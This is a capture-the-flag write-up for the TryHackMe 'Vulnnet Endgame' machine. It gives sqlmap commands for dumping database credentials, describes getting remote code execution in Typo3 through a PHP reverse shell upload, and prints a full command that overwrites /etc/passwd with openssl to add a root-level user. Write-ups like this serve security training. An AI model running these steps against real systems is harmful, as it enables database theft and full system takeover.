Vulnnet Endgame - THM - Key Points

• Initial scan reveals 22 and 80. We also have a domain name from the introduction of the box, so we can enumerate for subdomains
• Run gobuster vhost -u http://vulnnet.thm -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
• I found 4 more valid domains, blog, api, shop and admin1
• Brute forcing for directories in the admin1 domain reveals some interesting ones, like vendor, fileadmin, typo3temp, typo3
• Typo3 seems to be an open source CMS, we lack credentials to login though
• Analyzing the blog, we notice that opening blog posts triggers a request to the api domain that contains a blog parameter, like this one: /vn_internals/api/v2/fetch/?blog=5 
• Tampering with the parameter shows it is vulnerable to SQL Injection, so we can use sqlmap to automate the process of dumping the contents of the DB
• Using the --dbs flag we retrieve three possible databases to enumerate: blog, information_schema and vn_admin
• The blog database contains a list of usernames and passwords that we can retrieve like this: sqlmap -r VULNNET -D blog -T users -C username,password --dump
• Also, in the vn_admin database there is another username-password tuple, which can be retrieved like this: sqlmap -r VULNNET -D vn_admin -T be_users -C username,password --dump
• The hash in vn_admin can be cracked using the password list found in the blog db, and now we can access Typo3 as chris_w
• There is a known way to achieve RCE from Typo3 once you are authenticated: you can change the configuration to allow PHP uploads, so you can use a simple PHP reverse shell
• We are now www-data. Only user that stands out on the box is a system user
• In system's home there is a mozilla directory containing Firefox profiles. We can use Firefox Decrypt to find hidden credentials in one of these profiles, and use these credentials to escalate to the system user
• Running getcap -r / 2>/dev/null we find out that a version of openssl in our home can be used to escalate to root. As reported from GTFObins, we can use it to write to files. We can use the following instruction to add a new user to the box that has the same privileges as root, and our job is done
• The instruction is the following

echo "root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
avahi:x:115:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:116:121:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:118:122::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:119:123:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
system:x:1000:1000:system,,,:/home/system:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:123:65534::/run/sshd:/usr/sbin/nologin
root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" | ./openssl enc -out "/etc/passwd"

• In this case, root2's password is mrcake. Just su to root2 and get the last flag. Merry hacking ;)